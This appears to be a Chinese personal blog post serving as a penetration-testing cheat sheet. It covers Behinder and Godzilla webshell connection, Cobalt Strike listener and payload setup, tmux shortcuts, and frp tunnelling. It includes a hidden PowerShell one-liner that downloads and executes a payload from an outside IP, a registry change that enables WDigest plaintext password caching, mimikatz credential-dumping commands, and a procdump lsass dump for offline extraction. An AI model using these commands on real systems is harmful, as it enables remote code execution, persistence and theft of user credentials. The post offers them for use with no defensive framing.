渗透工具备忘录

webshell工具

冰蝎

冰蝎的连接较为简单:
输入url和密码以后选择脚本类型即可上线

image-20220418212525168

哥斯拉

哥斯拉马生成

管理——>生成——>生成对应的马并选择有效载荷和加密器

image-20220418220633085

哥斯拉马连接:

这里需要注意的是要记得配置代理,否则会链接失败,并且加密器要和刚才的对应

image-20220418220559912

CS

将CS上传至公网服务器,执行一下就可以启动,接下来将此IP以及密码填入即可,然后端口是50050

image-20220419183004280

获取beacon

创建listener

点击cobalt strike——>listeners——>Add(这里的端口需要设置成服务器上未使用的端口)

web Delivery 执行payload

选择scripted web delivery,然后生成payload

image-20220419192003622

接下来进行launch即可

image-20220419192042891

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://110.42.xxxx:8888/a'))"

image-20220419191939517

然后右键单击进行interact即可执行命令

tmux快捷键操作

发现tmux大家介绍的不错,所以想尝试一下,但发现无论ctrl+a,还是ctrl+b都不好使,经过一番努力后才发现应该是ctrl+b松开后再按其他键。例如ctrl+b ?,应该先同时按ctrl+b 松开后,shift+/(即输入?)。

# 查看有所有tmux会话
指 令:tmux ls
快捷键:Ctrl+b s

# 新建tmux窗口
指 令:tmux new -s <session-name>

# 重命名会话
指 令:tmux rename-session -t <old-name> <new-name>
快捷键:Ctrl+b $

# 分离会话
指 令:tmux detach 或者使用 exit(关闭窗口)
快捷键:Ctrl+b d

# 重新连接会话
指 令:tmux attach -t <session-name> 或者使用 tmux at -t <session-name>

#平铺当前窗格(个人很喜欢的快捷键,注意:平铺的是当前选中的窗格)
快捷键:Ctrl+b z (再次 Ctrl+b z 则恢复)

# 杀死会话
指 令:tmux kill-session -t <session-name>

# 切换会话
指 令:tmux switch -t <session-name>

# 划分上下两个窗格
指 令:tmux split
快捷键:Ctrl+b “

# 划分左右两个窗格
指 令:tmux split -h
快捷键:Ctrl+b %

# 光标切换到上方窗格
指 令:tmux select-pane -U
快捷键:Ctrl+b 方向键上

# 光标切换到下方窗格
指 令:tmux select-pane -D
快捷键:Ctrl+b 方向键下

# 光标切换到左边窗格
指 令:tmux select-pane -L
快捷键:Ctrl+b 方向键左

# 光标切换到右边窗格
指 令:tmux select-pane -R
快捷键:Ctrl+b 方向键右

https://blog.csdn.net/svap1/article/details/39694713

frp代理配置

首先配置一下服务器的代理,删除frpc 和 frpc.ini,编辑frps.ini

image-20220420220807853

frpc.ini配置,如果换了vps 改一下ip即可

image-20220420220653329

命令

./frps -c frps.ini	#启用服务端frp

mimikatz

注意:
当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

windows2003

使用管理员身份运行

#提升权限
privilege::debug

#抓取密码
sekurlsa::logonpasswords

当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。

cmd修改注册表命令:

Copyreg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#重启或用户重新登录后可以成功抓取
mimikatz # log
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

获取高版本windows系统的密码凭证(procdump导出)

使用procdump将lsass dump下来(需要管理员权限)

procdump.exe -accepteula -ma lsass.exe 1.dmp

将lsass.dmp下载到本地后,然后执行mimikatz:

Copymimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

为了方便复制与查看,可以输出到本地文件里面:

Copymimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" > pssword.txt

crackmap

Author

vague huang

Posted on

2022-04-18

Updated on

2022-04-21

Licensed under

Comments